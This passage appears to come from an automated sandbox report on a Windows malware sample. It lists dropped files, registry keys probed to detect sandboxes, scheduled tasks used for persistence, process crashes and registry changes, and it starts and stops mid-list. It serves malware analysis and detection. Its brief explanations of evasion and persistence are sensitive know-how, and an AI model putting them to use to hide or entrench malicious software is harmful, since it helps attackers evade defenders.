irecord.tmpprolab.tmpapp.exe7za.exeIBInstaller_97039.tmpSetup.exe19.exesetup_10.2_mix.exevict.tmpvpn.tmpsetup_10.2_us3.exe22.exe7za.exesetup.exevict.tmpapp.exeppppppfy.exeSetup.exe45y4koqd0ts.tmp7za.exedescription ioc process File opened for modification C:\Program Files (x86)\I-record\postproc-52.dll irecord.tmp File opened for modification C:\Program Files (x86)\Picture Lab\DockingToolbar.dll prolab.tmp File opened for modification C:\Program Files (x86)\Fragrant-Brook\help.txt app.exe File created C:\Program Files (x86)\Young-Fog\winamp.exe 7za.exe File created C:\Program Files (x86)\Install engine 16\is-RVNQJ.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\VR\Versium Research\22.exe Setup.exe File created C:\Program Files\install.dll 19.exe File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_4_pressed.png setup_10.2_mix.exe File created C:\Program Files (x86)\viewerise\unins000.dat vict.tmp File opened for modification C:\Program Files (x86)\VR\Versium Research\RmSetp.exe Setup.exe File created C:\Program Files (x86)\I-record\is-3NTAR.tmp irecord.tmp File created C:\Program Files (x86)\MaskVPN\is-1ABGE.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File opened for modification C:\Program Files (x86)\VR\Versium Research\RunWW.exe Setup.exe File opened for modification C:\Program Files (x86)\VR\Versium Research\UgEwD2Otfx9I.exe Setup.exe File opened for modification C:\Program Files (x86)\I-record\swresample-0.dll irecord.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_4_hover.png setup_10.2_us3.exe File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-1QNDJ.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-1FHVU.tmp vpn.tmp File created C:\Program Files (x86)\I-record\is-V5P8M.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Picture Lab\unins000.dat prolab.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_1_normal.png setup_10.2_us3.exe File created C:\Program Files\javcse\install.vbs 22.exe File created C:\Program Files (x86)\Divine-Shadow\winamp.exe 7za.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-9HF9V.tmp vpn.tmp File created C:\Program Files (x86)\I-record\is-0MCSM.tmp irecord.tmp File created C:\Program Files (x86)\Young-Fog\7za.exe setup.exe File opened for modification C:\Program Files (x86)\Advanced Trip\DreamTrip.exe setup_10.2_mix.exe File created C:\Program Files (x86)\viewerise\is-GBB89.tmp vict.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\TrayIcon1.ico setup_10.2_us3.exe File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_0_pressed.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_2_normal.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\Install engine 16\PPMd.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\I-record\is-FGLPG.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\TrayIcon3.ico setup_10.2_mix.exe File created C:\Program Files (x86)\Black-Glade\7za.dll app.exe File created C:\Program Files (x86)\MaskVPN\is-6VH58.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-RA3H3.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-NJINN.tmp vpn.tmp File created C:\Program Files\VideoLAN\PFBXJZZNUM\prolab.exe.config ppppppfy.exe File opened for modification C:\Program Files (x86)\VR\Versium Research\customer5.exe Setup.exe File created C:\Program Files (x86)\I-record\is-RV1R3.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Picture Lab\AForge.dll prolab.tmp File created C:\Program Files (x86)\Young-Fog\7za.dll setup.exe File created C:\Program Files (x86)\Young-Fog\winamp.7z setup.exe File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_3_pressed.png setup_10.2_mix.exe File created C:\Program Files (x86)\MaskVPN\driver\win764\is-D34LS.tmp vpn.tmp File created C:\Program Files (x86)\viewerise\is-4HPM5.tmp 45y4koqd0ts.tmp File created C:\Program Files (x86)\MaskVPN\is-6LIV3.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-3RFNQ.tmp vpn.tmp File opened for modification C:\Program Files (x86)\I-record\avformat-53.dll irecord.tmp File created C:\Program Files (x86)\Picture Lab\is-T3S1J.tmp prolab.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_0_hover.png setup_10.2_us3.exe File created C:\Program Files (x86)\Fragrant-Brook\winamp.exe 7za.exe File opened for modification C:\Program Files (x86)\Advanced Trip\TrayIcon.ico setup_10.2_us3.exe File opened for modification C:\Program Files (x86)\viewerise\unins000.dat vict.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-7KSB1.tmp vpn.tmp File opened for modification C:\Program Files (x86)\VR\Versium Research\customer5.exe Setup.exe File created C:\Program Files (x86)\Install engine 16\Hadoqoliju.exe.config ppppppfy.exe File created C:\Program Files (x86)\Picture Lab\is-45LD1.tmp prolab.tmp File created C:\Program Files (x86)\MaskVPN\is-GET3U.tmp vpn.tmp File opened for modification C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe Setup.exe File created C:\Program Files (x86)\Picture Lab\is-TRKB3.tmp prolab.tmp -
Drops file in Windows directory 43 IoCs
Processes:
msiexec.exevict.tmpsvchost.exeMicrosoftEdge.exeMicrosoftEdge.exeschtasks.exeMicrosoftEdge.exetapinstall.exeaipackagechainer.exemultitimer.exeschtasks.exesvchost.exemultitimer.exeexpand.exeDrvInst.exemultitimer.exeMicrosoftEdge.exeMicrosoftEdge.exedescription ioc process File opened for modification C:\Windows\Installer\MSI2C3C.tmp msiexec.exe File opened for modification C:\Windows\inf\oem2.inf vict.tmp File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\Installer\f77c3c4.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIDD88.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDFAC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2843.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Tasks\bmIXAqnwlcZKDlfrrr.job schtasks.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\INF\setupapi.dev.log vict.tmp File created C:\Windows\Tasks\.job aipackagechainer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File created C:\Windows\Tasks\bmIXAqnwlcZKDlfrrr.job schtasks.exe File opened for modification C:\Windows\Tasks\bmIXAqnwlcZKDlfrrr.job svchost.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Installer\MSID8E2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI24C6.tmp msiexec.exe File created C:\Windows\Installer\f77c3c4.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIDB93.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Tasks\.job svchost.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Installer\MSI3FA6.tmp msiexec.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSIE441.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSIE401.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIE78D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI264E.tmp msiexec.exe File created C:\Windows\inf\oem2.inf vict.tmp File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 20 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6888 5596 WerFault.exe winlthsth.exe 7004 2220 WerFault.exe xal3k1mgbcp.exe 3468 2220 WerFault.exe xal3k1mgbcp.exe 848 2220 WerFault.exe xal3k1mgbcp.exe 4064 2220 WerFault.exe xal3k1mgbcp.exe 8020 2220 WerFault.exe xal3k1mgbcp.exe 5156 2220 WerFault.exe xal3k1mgbcp.exe 2284 2220 WerFault.exe xal3k1mgbcp.exe 7308 2220 WerFault.exe xal3k1mgbcp.exe 6188 2220 WerFault.exe xal3k1mgbcp.exe 8464 6388 WerFault.exe RunWW.exe 9856 4936 WerFault.exe win1host.exe 7144 7704 WerFault.exe bevkagomcxv.exe 8052 7704 WerFault.exe bevkagomcxv.exe 4280 7704 WerFault.exe bevkagomcxv.exe 5708 7704 WerFault.exe bevkagomcxv.exe 5412 7704 WerFault.exe bevkagomcxv.exe 6712 7704 WerFault.exe bevkagomcxv.exe 10144 7704 WerFault.exe bevkagomcxv.exe 8804 7704 WerFault.exe bevkagomcxv.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exeDrvInst.exesvchost.exevict.tmpb9706c20.exetapinstall.exetapinstall.exeb9706c20.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 vict.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b9706c20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b9706c20.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b9706c20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b9706c20.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b9706c20.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\UpperFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exesvchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 8408 schtasks.exe 4980 schtasks.exe 9084 schtasks.exe 8256 schtasks.exe -
Delays execution with timeout.exe 4 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exepid process 6972 timeout.exe 4088 timeout.exe 5572 timeout.exe 6112 timeout.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
Processes:
multitimer.exemultitimer.exesetup.exexcopy.exexcopy.exesetup.exemultitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
GoLang User-Agent 2 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 584 Go-http-client/1.1 HTTP User-Agent header 587 Go-http-client/1.1 -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 4840 taskkill.exe 10232 taskkill.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
svchost.exemask_svc.exepowershell.exevict.tmpfile.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1802 = "Line Islands Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs vict.tmp Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2792 = "Novosibirsk Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created 